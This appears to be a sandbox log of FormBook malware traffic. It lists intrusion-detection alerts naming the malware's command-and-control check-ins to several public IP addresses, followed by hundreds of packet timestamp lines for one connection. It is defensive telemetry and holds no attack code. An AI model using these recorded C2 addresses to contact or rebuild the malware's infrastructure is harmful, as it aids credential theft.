2024-10-21T13:15:20.479155+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.22 | 49167 | 3.33.130.190 | 80 | TCP
2024-10-21T13:15:35.537377+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49170 | 185.174.173.22 | 80 | TCP
2024-10-21T13:15:35.537377+0200 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.22 | 49170 | 185.174.173.22 | 80 | TCP
2024-10-21T13:15:39.177209+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49171 | 185.174.173.22 | 80 | TCP
2024-10-21T13:15:40.619644+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49172 | 185.174.173.22 | 80 | TCP
2024-10-21T13:15:44.341147+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.22 | 49173 | 185.174.173.22 | 80 | TCP
2024-10-21T13:15:57.582707+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49174 | 162.0.238.246 | 80 | TCP
2024-10-21T13:16:00.822682+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49175 | 162.0.238.246 | 80 | TCP
2024-10-21T13:16:02.679402+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49176 | 162.0.238.246 | 80 | TCP
2024-10-21T13:16:07.187952+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.22 | 49177 | 162.0.238.246 | 80 | TCP
2024-10-21T13:16:12.243108+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49178 | 15.197.148.33 | 80 | TCP
2024-10-21T13:16:15.421025+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49179 | 15.197.148.33 | 80 | TCP
2024-10-21T13:16:17.343047+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49180 | 15.197.148.33 | 80 | TCP
2024-10-21T13:16:20.496951+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.22 | 49181 | 15.197.148.33 | 80 | TCP
2024-10-21T13:16:25.531397+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49182 | 206.119.82.148 | 80 | TCP
2024-10-21T13:16:29.267849+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49183 | 206.119.82.148 | 80 | TCP
2024-10-21T13:16:30.703523+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49184 | 206.119.82.148 | 80 | TCP
2024-10-21T13:16:34.567266+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.22 | 49185 | 206.119.82.148 | 80 | TCP
2024-10-21T13:16:39.635129+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49186 | 15.197.148.33 | 80 | TCP
2024-10-21T13:16:42.788385+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49187 | 15.197.148.33 | 80 | TCP
2024-10-21T13:16:44.720576+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49188 | 15.197.148.33 | 80 | TCP
2024-10-21T13:16:48.792562+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.22 | 49189 | 15.197.148.33 | 80 | TCP
2024-10-21T13:16:53.831892+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.22 | 49190 | 208.91.197.27 | 80 | TCP
                                                                                                  Oct 21, 2024 13:15:28.039057970 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.039058924 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.039093971 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.039093971 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.039913893 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.039932966 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.039942980 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.039954901 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.039966106 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.039974928 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.039983034 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.039988041 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.040002108 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.040011883 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.040011883 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.040039062 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.040039062 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.040833950 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.040846109 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.040857077 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.040888071 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.040890932 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.040903091 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.040921926 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.040934086 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.040961027 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.040961027 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.040992975 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.041826010 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.041843891 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.041872025 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.041888952 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.041889906 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.041951895 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.081834078 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.081845999 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.081877947 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.081888914 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.081899881 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.081893921 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.081938028 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.081938028 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.081938028 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.156589985 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156603098 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156614065 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156622887 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156708956 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156719923 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156737089 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156748056 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156748056 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.156749010 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.156758070 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156769991 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156780958 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156791925 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156802893 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.156833887 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.156833887 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.156833887 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.156833887 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.156833887 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.156833887 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.157051086 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.157407045 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.157418013 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.157427073 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.157458067 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.157480955 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.157612085 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.157623053 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.157634020 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.157644033 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.157653093 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.157684088 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.157684088 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.157942057 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.157953024 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.157963037 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.157989025 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.158003092 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158010006 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.158015013 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158029079 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158039093 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158049107 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158055067 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.158078909 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.158078909 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.158579111 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158591032 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158601046 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158627033 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.158648968 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.158657074 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158668041 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158678055 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158689976 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158708096 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158710003 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.158710003 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.158719063 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158730984 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.158737898 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.158755064 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.158781052 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.159482002 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.159499884 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.159533978 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.200979948 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.201021910 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.201035023 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.201067924 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.201066971 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.201119900 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.201119900 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275445938 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.275480032 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.275532961 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.275567055 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.275564909 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275564909 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275602102 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.275604010 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275604010 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275635958 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.275640965 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275674105 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.275681973 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275717020 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275806904 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.275849104 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275871038 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275892019 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.275922060 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.275945902 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275964022 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.275973082 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276005983 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276019096 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276041985 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276051998 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276076078 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276079893 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276110888 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276125908 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276145935 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276149035 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276180983 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276185036 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276210070 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276226044 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276252985 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276392937 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276444912 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276444912 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276494980 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276498079 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276534081 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276540041 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276566982 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276597977 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276602983 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276618004 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276643038 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.276834965 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.276886940 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.515724897 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.515726089 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.515758991 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.515763044 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.515794992 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.515803099 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.515867949 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.558609009 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.558657885 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.558693886 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.558727980 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.558759928 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.558763981 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.558795929 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.558805943 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.603137970 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.603173971 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.603184938 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.603197098 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.603195906 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.603254080 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.603254080 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632371902 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632390022 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632402897 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632422924 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632477999 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632477999 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632577896 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632590055 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632601976 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632611990 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632612944 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632627964 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632642031 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632720947 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632731915 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632741928 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632752895 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632759094 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632775068 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632787943 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632913113 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632922888 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632936001 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632950068 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632953882 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632966995 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632977962 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.632983923 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632983923 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.632992983 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633001089 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633002996 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633017063 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633034945 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633304119 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633315086 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633325100 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633348942 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633368015 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633430958 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633441925 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633454084 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633465052 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633471966 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633479118 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633483887 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633498907 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633512974 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633752108 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633763075 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633774996 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633784056 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633789062 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633796930 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633801937 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633810043 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633816004 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633824110 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633838892 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633847952 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633852005 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633860111 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633871078 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633878946 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633882046 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.633897066 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633908987 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.633945942 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634454012 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634464979 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634476900 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634489059 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634493113 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634500980 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634505033 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634511948 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634521961 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634524107 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634535074 CEST804916945.33.6.223192.168.2.22
                                                                                                  Oct 21, 2024 13:15:28.634542942 CEST4916980192.168.2.2245.33.6.223
                                                                                                  Oct 21, 2024 13:15:28.634558916 CEST4916980192.168.2.2245.33.6.223
